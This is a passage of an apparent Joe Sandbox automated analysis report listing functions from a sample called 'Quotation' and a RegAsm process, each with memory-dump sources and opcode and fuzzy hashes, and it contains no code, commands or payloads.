                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2245769976.0000000002240000.00000040.00000800.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2240000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc432c8f402d1fdf6de00208e2690a8230c7609731cd24e2388a2fb3ede2cd7e
                                          • Instruction ID: 7f2eba57956d290948ea57073c1482ec65ae5d282f5300835a63e4e786a3d04e
                                          • Opcode Fuzzy Hash: cc432c8f402d1fdf6de00208e2690a8230c7609731cd24e2388a2fb3ede2cd7e
                                          • Instruction Fuzzy Hash: 61714A70E40649CFEB58EFBAE89069ABBF7BFC9304F14C529C1159B268EB7058458F50
                                          Function 05864FE0 Relevance: .1, Instructions: 144COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c07da597544c68bc438016c6ee697480fa967605ad3a6bb1ecada086dc20a93d
                                          • Instruction ID: a5740e6d1fab73a0cdbb56b8ea9adf08209ab9bde2ec1a43fecc5cb6f07c80d6
                                          • Opcode Fuzzy Hash: c07da597544c68bc438016c6ee697480fa967605ad3a6bb1ecada086dc20a93d
                                          • Instruction Fuzzy Hash: 1A511370D06208CFDB14DFA9D5847EEBBB6BB8A304F505029D819AB394D7759C46CF42
                                          Function 05864FD0 Relevance: .1, Instructions: 143COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b09a4c431dfd7bf1f07d9e175641ee8b74fe9f725ae627fb24cde91d3fe7bf6
                                          • Instruction ID: c75780f847670f2e198a34cdea994235e7e4b17d00635ab294ba599e612f358d
                                          • Opcode Fuzzy Hash: 1b09a4c431dfd7bf1f07d9e175641ee8b74fe9f725ae627fb24cde91d3fe7bf6
                                          • Instruction Fuzzy Hash: AA513570D02208CFDB14DFA9D5887EEBBB6BB8A304F50502AD819AB394D7749C46CF42
                                          Function 05785359 Relevance: .1, Instructions: 127COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 553ef22de8a691b1fbb7460316f266482d3adff933c5148eaa799a43d27cafc2
                                          • Instruction ID: 305e05eff71923a0857b194219569604ab1f54bb70d73b3bcfaa85c501fd7023
                                          • Opcode Fuzzy Hash: 553ef22de8a691b1fbb7460316f266482d3adff933c5148eaa799a43d27cafc2
                                          • Instruction Fuzzy Hash: C1416B71E046199BDB18CFABD94059EFBF3BFC8300F14C17AD518AB264DA3459468F50
                                          Function 05930006 Relevance: .1, Instructions: 122COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254869468.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5930000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2641693a34a882092628096c56b2f76d7c009704d29e95ca846607d553569dd9
                                          • Instruction ID: 437210df1922637bf143af6ade76a0db4e6b5b4d8c811b29830f61665750f0a3
                                          • Opcode Fuzzy Hash: 2641693a34a882092628096c56b2f76d7c009704d29e95ca846607d553569dd9
                                          • Instruction Fuzzy Hash: 91518271D056588BE72DCF278D552CAFAF3AFC9300F04C1FA954CA6255EB740A868F50
                                          Function 058651D0 Relevance: .1, Instructions: 116COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47405b90f01b5f3b16ce6a852ac444b7bfe95c34cec7308e7d7774548e2c73ae
                                          • Instruction ID: 5bba0c12d766f185275a4d28f0990fb906cd9caaad7132a0cbab06f677e5084a
                                          • Opcode Fuzzy Hash: 47405b90f01b5f3b16ce6a852ac444b7bfe95c34cec7308e7d7774548e2c73ae
                                          • Instruction Fuzzy Hash: D141F670D02208CFDB14DFA8D5886EDBBB6BF4A305F905025D819AB395D774AD42CF46
                                          Function 0593D578 Relevance: .1, Instructions: 114COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254869468.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5930000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 050e8d7b5bf689859052da56253a94f9333ee8e4410373d9292677ccb68cf58b
                                          • Instruction ID: 8e2df1328457c5493773f0315a05142d0b900589e90ec5c5b7918faee3213c32
                                          • Opcode Fuzzy Hash: 050e8d7b5bf689859052da56253a94f9333ee8e4410373d9292677ccb68cf58b
                                          • Instruction Fuzzy Hash: 4841FEB0D00348DFDB10CFA9D996AADBBF1BB49344F20902AE429AB250D7749845CF45
                                          Function 058D0006 Relevance: .1, Instructions: 112COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d5e62bf5aeff7af040ce0dbbdea6e79ca840d06c516a350691e4a34d89b5117d
                                          • Instruction ID: a1935d58aded19d3e9603de4fd0219aca57ea3eac02331f3bbf07a64f47c7d34
                                          • Opcode Fuzzy Hash: d5e62bf5aeff7af040ce0dbbdea6e79ca840d06c516a350691e4a34d89b5117d
                                          • Instruction Fuzzy Hash: B141FF75C05298DFCB01CFA9D484AEEFBF0AF0A310F14806AE454BB251D738AA49CF64
                                          Function 05B80040 Relevance: .1, Instructions: 111COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2255143793.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5b80000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c9b96449175991ec9dd8d7a171ecb89d77f61e4176ebdc2cc0c19e1ca9ee124
                                          • Instruction ID: e31dcb64c60066b66cf9cacbcdbe14e76622c9c43c1e63f7c65e0cfab4062471
                                          • Opcode Fuzzy Hash: 1c9b96449175991ec9dd8d7a171ecb89d77f61e4176ebdc2cc0c19e1ca9ee124
                                          • Instruction Fuzzy Hash: 5B51F774E04628DFDB28DF6AC948A9AB7F6BF89300F00C0EA951DA7254DB305E85CF01
                                          Function 058D0040 Relevance: .1, Instructions: 95COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 442aa83c5ba1284d873d2771e2ddfc238ebf73a1e3ad57e72a356143a08aa48a
                                          • Instruction ID: c64ba244a705e76b75a04e025f6d02419b18d53f601bf64ac7f0db64efa76321
                                          • Opcode Fuzzy Hash: 442aa83c5ba1284d873d2771e2ddfc238ebf73a1e3ad57e72a356143a08aa48a
                                          • Instruction Fuzzy Hash: 2741ECB5D04259DFDB00CFAAD484AEEFBF4AB49310F14902AE415B7240D738AA45CFA4
                                          Function 0593ECA0 Relevance: .1, Instructions: 76COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254869468.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5930000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5575479e5aa1fdea337a8d4be3d7666576ed115c958183a43196c8705c3b88a1
                                          • Instruction ID: b28fa2dc031cc614a964b697aecefc6c1b214145f3c48b2cfd19d6662ba20ca0
                                          • Opcode Fuzzy Hash: 5575479e5aa1fdea337a8d4be3d7666576ed115c958183a43196c8705c3b88a1
                                          • Instruction Fuzzy Hash: 2431C7B1E01218CBEB29CF6AC9416D9BBF7AF89300F14C4A9C409AB314DB745A858F50
                                          Function 05B80006 Relevance: .1, Instructions: 75COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2255143793.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5b80000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f8737df6fc9999591ef1bf28d6351c9cc0c19d7877520536f6ae7290a4250254
                                          • Instruction ID: dbece060ffbd2315cc2433f37124c209f61a0355bdbb010eb1cde68ebd8eb4bd
                                          • Opcode Fuzzy Hash: f8737df6fc9999591ef1bf28d6351c9cc0c19d7877520536f6ae7290a4250254
                                          • Instruction Fuzzy Hash: EA316E71D097589FE729CF668C1979ABBF3AF86300F08C0EA844CAA265DB301985CF01
                                          Function 02247188 Relevance: .1, Instructions: 71COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2245769976.0000000002240000.00000040.00000800.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2240000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d65d29ba92ecbf7675f468f3da48c5e3f160e6a9a70aeeb66258c941183becbf
                                          • Instruction ID: 80b32cb1d21dfba0c98fb16dcdfbc1613fe00faadf010a135554915f05f7a4ee
                                          • Opcode Fuzzy Hash: d65d29ba92ecbf7675f468f3da48c5e3f160e6a9a70aeeb66258c941183becbf
                                          • Instruction Fuzzy Hash: 7D31AAB1E116188BEB58CF6BC95878EFAF7BFC9304F14C1A9C40CA6254DB740A858F51
                                          Function 0578003B Relevance: .1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: be1a9d7ac245cbf7f40ce2e5f9d855bb435925df0c5d51af3d694f39accc2aa1
                                          • Instruction ID: 40b3e038557074d0ce4532ac504122e942a6a70c4c193cf84e1ba7d8bd160702
                                          • Opcode Fuzzy Hash: be1a9d7ac245cbf7f40ce2e5f9d855bb435925df0c5d51af3d694f39accc2aa1
                                          • Instruction Fuzzy Hash: 4B219171E056198BEB5CDF6B8D4929EFAF7AFC8300F14C1BA840CA6214DB311A85DF50
                                          Function 0586B790 Relevance: .1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27c39e12072fec70474bac0c02abf91bef38787298c68dd21d31eb5f821d3361
                                          • Instruction ID: 1bc30536206b3e3c558502fdb752792dfeb7e2ffb8d8a223784f3f8188d05f99
                                          • Opcode Fuzzy Hash: 27c39e12072fec70474bac0c02abf91bef38787298c68dd21d31eb5f821d3361
                                          • Instruction Fuzzy Hash: E321EFB5D04218DFDB10CFA9D981AEEFBF4BB49310F14902AE815B7210CB356905CFA4
                                          Function 0586B798 Relevance: .1, Instructions: 66COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: efb2460428eb1dd581cc18755d69d032bb589ca1353baad86649a2f4b4b9f091
                                          • Instruction ID: d02dab34a0415ee2335ceb0f48c9ba75646fe4837a5666cc476079681faa6169
                                          • Opcode Fuzzy Hash: efb2460428eb1dd581cc18755d69d032bb589ca1353baad86649a2f4b4b9f091
                                          • Instruction Fuzzy Hash: 6221EDB5D04218DFDB10CFA9D981AEEFBF4BB49310F10902AE815B7210C7356905CFA4
                                          Function 05780348 Relevance: 5.1, Strings: 4, Instructions: 72COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: "$+$C$g
                                          • API String ID: 0-2429595731
                                          • Opcode ID: 680f817c4037b4faf3f5cca4827d8588aaa5cc2b16ca2e7d3a80e3e14fa418ed
                                          • Instruction ID: d80eb41225892029bed29d79da07dae5550f7b819438bdd2952387e1bccadbcf
                                          • Opcode Fuzzy Hash: 680f817c4037b4faf3f5cca4827d8588aaa5cc2b16ca2e7d3a80e3e14fa418ed
                                          • Instruction Fuzzy Hash: F831BE70D5522CCEEB24EF64C88D7ECBBB1BB09314F5025A9C00AA3250C7781AC8CF04

                                          Executed Functions

                                          Function 012D9DE0 Relevance: 1.1, Instructions: 1129COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b6ad86299c940671434c6277a6f53eeced0544a6355b33a332451dd6d601c223
                                          • Instruction ID: 6563f15832ca8cdcd26a56024ac847215f75b2ab80429c6cb706446dda34e4b9
                                          • Opcode Fuzzy Hash: b6ad86299c940671434c6277a6f53eeced0544a6355b33a332451dd6d601c223
                                          • Instruction Fuzzy Hash: 03A28D70A1020ACFDB15CFA8C984EAEBBF6BF88310F158569E505DB3A6D771E841CB51
                                          Function 012D29E0 Relevance: .7, Instructions: 685COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5be1fbea9b005f7bb9a2322894523db58d58c5cee18eef9bd9f7bf6908a83f11
                                          • Instruction ID: 0cb7835ccab940743819e548ef1003ad3788dd25ce0398b01f2ad18366b18434
                                          • Opcode Fuzzy Hash: 5be1fbea9b005f7bb9a2322894523db58d58c5cee18eef9bd9f7bf6908a83f11
                                          • Instruction Fuzzy Hash: 0A4227B2D18755CFCBA2CF38C4893A67FB4FB55314B48899ED48296246E735DC00CB9A
                                          Function 012D6FC8 Relevance: .5, Instructions: 524COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 114ecc898a4d3308b33d8241dfdf52d7e352bcf3c525ffe07682db52b70c0296
                                          • Instruction ID: c924515b5968984fa064a9ea8e6c0285569a03a7761abb8a98fec4ebd0caf73b
                                          • Opcode Fuzzy Hash: 114ecc898a4d3308b33d8241dfdf52d7e352bcf3c525ffe07682db52b70c0296
                                          • Instruction Fuzzy Hash: 81226D30A20259CFDB15CF68D884AAEBBF6FF49318F55806AE905DB2A1D738DC41CB51
                                          Function 012D69A0 Relevance: .5, Instructions: 512COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac047fd644e301432ba9ab1e4736fbf6adc316c33cce63b00e26cd0bfb5a5a2f
                                          • Instruction ID: 65d7be455988149a674b3ede4269b1e2b7687f98599f1ff019b2508ed113207c
                                          • Opcode Fuzzy Hash: ac047fd644e301432ba9ab1e4736fbf6adc316c33cce63b00e26cd0bfb5a5a2f
                                          • Instruction Fuzzy Hash: 8A129F70A102198FDB14DFA9D854BAEBBF6BF88300F248569E506EB395DF349D41CB90
                                          Function 012DC146 Relevance: .2, Instructions: 240COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd19e22f71773b310e7a1f27dfb6586967e177aeddf6ca334213a28629e9dfd
                                          • Instruction ID: 95a6cc190f9ec29e3b59bd2424f82e480bec73d899bf9cdecf287f5bf6a75e81
                                          • Opcode Fuzzy Hash: 6bd19e22f71773b310e7a1f27dfb6586967e177aeddf6ca334213a28629e9dfd
                                          • Instruction Fuzzy Hash: FCA1F674E10258DFDB14DFBAD884A9DBBF2BF89310F14806AE509AB365DB709942CF50
                                          Function 012DC468 Relevance: .2, Instructions: 200COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b582b2eafb018dbca758895beafc320c3aa326b77ebe9e1040920c551dc1a4fc
                                          • Instruction ID: 35450606fd06e31be41cd572db3e6565f0cc1a749385fa1444564c44a4882eaf
                                          • Opcode Fuzzy Hash: b582b2eafb018dbca758895beafc320c3aa326b77ebe9e1040920c551dc1a4fc
                                          • Instruction Fuzzy Hash: EE91D574E10258CFDB14DFAAD884A9DBBF2BF88300F14C06AE919AB365DB319941CF51
                                          Function 012D5370 Relevance: .2, Instructions: 186COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 777b319becc31a1be1d4506084e60035fcfc6b5f318458b4c1e2af80ed812f9a
                                          • Instruction ID: 2c1391e842cc61a89b238feef37c8d1448cbaa6eda6f9ccd05c1aee44b7d7945
                                          • Opcode Fuzzy Hash: 777b319becc31a1be1d4506084e60035fcfc6b5f318458b4c1e2af80ed812f9a
                                          • Instruction Fuzzy Hash: 0F81AF74E10218DFEB14DFAAD984A9DBBF2FF88301F148069E809AB365DB709941CF51
                                          Function 012DD599 Relevance: .2, Instructions: 186COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1682291c7b9ef3e2515113ff0f9572e5bd6e1b833369816696e8fbfdd02dd82b
                                          • Instruction ID: 881a37c05198284e811d1fbdabdf17d955b2548a18702a67f6637e5262bfa3bb
                                          • Opcode Fuzzy Hash: 1682291c7b9ef3e2515113ff0f9572e5bd6e1b833369816696e8fbfdd02dd82b
                                          • Instruction Fuzzy Hash: FA81C474E10658CFEB14DFAAD884A9DBBF2BF88300F14C0A9E509AB365DB309945CF50
                                          Function 012DCA08 Relevance: .2, Instructions: 186COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1da08e5ba4b4333d83c2c0ef7a87b7d28ac80f044c3843b2eb1a92d10c639702
                                          • Instruction ID: 637c99bfe85a888aaac59513d154fe3b4403afc4b77cd766ded3a0f74570e061
                                          • Opcode Fuzzy Hash: 1da08e5ba4b4333d83c2c0ef7a87b7d28ac80f044c3843b2eb1a92d10c639702
                                          • Instruction Fuzzy Hash: A581B374E10218CFEB14DFAAD994A9DBBF2BF89300F14C069E919AB365DB309941CF50
                                          Function 012DCCD8 Relevance: .2, Instructions: 186COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29ff10c4360999841ad801559bae06f9929897a8eb6daee59f385119a7f8503f
                                          • Instruction ID: fc78a8f523c8992b01ae00e17565c55bea03e6c0fce9fbad399bb684693a804b
                                          • Opcode Fuzzy Hash: 29ff10c4360999841ad801559bae06f9929897a8eb6daee59f385119a7f8503f
                                          • Instruction Fuzzy Hash: B981C2B4E10258DFEB14DFAAD884A9DBBF2BF89300F14C069E509AB365DB309941CF50
                                          Function 012DC738 Relevance: .2, Instructions: 185COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67e1b6a640b675f8f7f3cdbb055e4dce8e0ffa5f2881a9af867a712536530c47
                                          • Instruction ID: ee68f3f0d73c7bf6d126f25d8c9fdefc147618a7801dc148697a88c958703334
                                          • Opcode Fuzzy Hash: 67e1b6a640b675f8f7f3cdbb055e4dce8e0ffa5f2881a9af867a712536530c47
                                          • Instruction Fuzzy Hash: 8981B374E10218CFEB14DFAAD984A9DBBF2BF88300F14C069E919AB365DB309941CF50
                                          Function 012DCFA9 Relevance: .2, Instructions: 185COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d5fa7f3587d37e99070a9499a25034594c3b809d899a350821415c9395ccac9a
                                          • Instruction ID: 1440ea7443629f5e13e471d192ab446bf04d52f8006da62fac95ca47eb636414
                                          • Opcode Fuzzy Hash: d5fa7f3587d37e99070a9499a25034594c3b809d899a350821415c9395ccac9a
                                          • Instruction Fuzzy Hash: 4E81A274E10618CFEB14DFAAD884A9DBBF2FF88310F148169E919AB365DB309945CF50
                                          Function 012DE983 Relevance: .1, Instructions: 147COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4aef7e4e415f2e3f15f3894079599d823fdf1ed9a50e3759db4b2d804da89f4d
                                          • Instruction ID: ee1f1b0d319c376a0070d2ca29e131c9cffb36066c662adf9b81c1a72adc09de
                                          • Opcode Fuzzy Hash: 4aef7e4e415f2e3f15f3894079599d823fdf1ed9a50e3759db4b2d804da89f4d
                                          • Instruction Fuzzy Hash: EB51B674E01209DFDB18DFAAD994A9DBBB2BF89310F248129E915AB365DB305841CF14
                                          Function 012DE990 Relevance: .1, Instructions: 147COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d16098d704c300378bca2825d478095c2e5817964c6cb60d8a99230ac8506584
                                          • Instruction ID: 449145273045ec00ec6e75437be0a00767d9472acfe947b025d9f5edbd178edb
                                          • Opcode Fuzzy Hash: d16098d704c300378bca2825d478095c2e5817964c6cb60d8a99230ac8506584
                                          • Instruction Fuzzy Hash: 8051A874E00609DFEB18DFAAD594A9DBBF2FF89300F248029E915AB365DB305841CF14
                                          Function 012DE011 Relevance: .7, Instructions: 653COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 329f1fa949c798d279d6156ba59989da40bfc26c75936af8bbc0401fbc5b5a3c
                                          • Instruction ID: 926469ff11488c21b56c44ed383652b0ee05bd0ecd85aa5c863c947dfa3a7742
                                          • Opcode Fuzzy Hash: 329f1fa949c798d279d6156ba59989da40bfc26c75936af8bbc0401fbc5b5a3c
                                          • Instruction Fuzzy Hash: 8E12AA760212468FE3662F24F6FC12E7A65FB0F733B076D28E15B8056DEB3504498B66
                                          Function 012DE020 Relevance: .6, Instructions: 647COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c031ffba588fd2e0594ef498fcb3d2aadf78b86fa2bd4358f6c7b46be24c1375
                                          • Instruction ID: 799d0d33e18b6bc5db94214df43986b4b1e202d7d2a898625fb2b9b3faa18c69
                                          • Opcode Fuzzy Hash: c031ffba588fd2e0594ef498fcb3d2aadf78b86fa2bd4358f6c7b46be24c1375
                                          • Instruction Fuzzy Hash: 461299760212468FE3662F24F6FC12E7A65FB0F733B076D28E15B8056DAB3504498F66
                                          Function 012D0C8F Relevance: .5, Instructions: 545COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
